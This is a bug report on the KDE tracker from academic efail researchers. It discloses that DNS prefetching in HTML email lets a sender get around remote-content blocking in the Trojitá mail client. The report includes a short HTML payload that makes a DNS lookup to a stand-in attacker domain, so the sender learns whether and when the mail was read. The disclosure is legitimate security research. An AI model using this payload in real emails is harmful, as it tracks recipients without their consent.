https://bugs.kde.org/show_bug.cgi?id=390452
Bug ID: 390452
Summary: HTML Backchannel in Trojitá Mail Client: DNS
Prefetching
Product: trojita
Version: unspecified
Platform: Other
OS: Linux
Status: UNCONFIRMED
Severity: normal
Priority: NOR
Component: Core
Assignee: trojita-b...@kde.org
Reporter: jens.a.mueller+...@rub.de
Target Milestone: ---
Created attachment 110652
--> https://bugs.kde.org/attachment.cgi?id=110652&action=edit
HTML Backchannel in Trojitá Mail Client: DNS Prefetching
Dear Trojitá Devs,
In the scope of academic research within the efail project, in cooperation with
Ruhr-University Bochum and FH Münster, Germany we systematically analyzed
Trojitá for `web bugs' and other backchannels which have an impact on the
user's privacy. The results are as follows.
*** Introduction ***
It is well known that spammers abuse `web bugs' -- 1x1 pixel images in HTML
emails -- to track if their mails to a certain address are actually read. To
respect the privacy of their customers most email clients, by default, block
external content. However, we found a bypass for remote content blocking in
Trojitá.
*** The Impact ***
The issue allows the sender of an email to leak information such as:
- if and when the mail has been read
- the number of users on a mailing list
*** The Bypass ***
The following HTML email triggers a DNS request to the DNS server responsible
for tracking-id.attacker.com when the email is opened in Trojitá (without any
user interaction required):
<meta http-equiv="x-dns-prefetch-control" content="on">
<a href="http://tracking-id.attacker.com";></a>
Note that it is easy to set up a DNS server controlled by the spammer
responsible for her own domain, attacker.com, and all its subdomains.
Greetings,
Jens
--
You are receiving this mail because:
You are watching all bug changes.
